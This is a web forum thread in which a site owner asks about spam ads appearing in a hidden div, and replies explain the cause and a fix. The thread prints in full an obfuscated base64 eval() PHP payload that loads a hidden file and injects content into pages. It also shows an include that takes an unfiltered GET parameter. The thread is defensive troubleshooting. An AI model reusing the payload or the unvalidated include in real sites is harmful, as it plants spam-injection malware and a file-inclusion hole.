I've been trying to figure out how this has been happening, but haven't found a solution yet. I have a HUGE chunk of jumbled text ads hidden in a div on my site, but how they're getting there I just don't know. You can view the source of the page here http://validator.w3.org/check?uri=http%3A%2F%2Fwww.buzzdphoto.com%2F&charset=(detect+automatically)&doctype=Inline&ss=1&group=0&user-agent=W3C_Validator%2F1.654

Scroll to line 34 on that page and you'll see what I'm talking about. It was suggested to me in an online chat with support that maybe this code was causing the trouble. Any thoughts?


<div id="content">
<?php // autodefine globals deprecated
$p = $_GET["p"];
if (! file_exists("$p.php"))
{
include("services.php");
}
else
{
include("$p.php");
}
?>
</div>

Also, this is at the top of almost every php page. Maybe it has something to do with these ads?


<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXsk R0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG 9tZS9idXp6ZHBoby9wdWJsaWNfaHRtbC9ibG9nL3dwLWluY2x1 ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL3NraW5zL2 8yazcvaW1nL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcv aG9tZS9idXp6ZHBoby9wdWJsaWNfaHRtbC9ibG9nL3dwLWluY2 x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL3NraW5z L28yazcvaW1nL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leG lzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW 5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURD NjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNE QzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2 MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQz Q3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRB MjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OE NERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIz NkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2Jy xzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjcz Mjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQj IwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5 NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4OD Q2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIw OTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0 E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG ODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQU RDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdB N0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERT hCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0Qx QzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRk Q2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwk UjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO3 1pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZC JjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFND ErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlG NTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMz RGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1 QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMz IzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMx MEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3ND A2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1 RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbi BkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVF MENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKT skUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6 ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NU UwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0Uz M0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm 4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScs JyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0Rk I5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAx N0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KC dkZ29iaCcpO319fQ==')); ?>

here is where you learn about script injection or xss

http://www.php.net/manual/en/function.base64-decode.php
http://www.php.net/manual/en/function.eval.php

php code to start a comment block is /*
php code to end a comment block is */

you have given access to the out side world by accepting most anything to come into the p variable. you have a link that makes the index page accept p=contact but you are not preventing p from being many other things that could change the output of your code.

besides java form validation you can filter php variables to accept only data that is equal to or similar to what you want (text, numbers, characters, etc)

this is some variable info if you dont know already
http://www.php.net/manual/en/language.variables.external.php

there are many functions that can be done to a variable in this list (http://www.php.net/manual/en/ref.strings.php) just read their descriptions, more commonly other filters (http://www.php.net/manual/en/filter.filters.php) can be applied using this function (http://www.php.net/manual/en/function.filter-input.php) and that would probably help eliminate your threat.

how about the "too vague" approach

this is your code:

<?php // autodefine globals deprecated
$p = $_GET["p"];
if (! file_exists("$p.php"))
{
include("services.php");
}
else
{
include("$p.php");
}
?>you have three pages how about using this for your code:

<?php
$p = $_GET["p"];
if ($p=="contact"){
include("contact.php");
} else if ($p=="portfolio"){
include("portfolio.php");
} else {
include("services.php");
}
$p=""; // this would reset the variable to nothing to make sure it wasn't echoed latter from some other injection
?>

Excellent! I had a distant feeling it might've had something to do with some sort of injection. Wasn't entirely sure. Thanks so much for the resources :)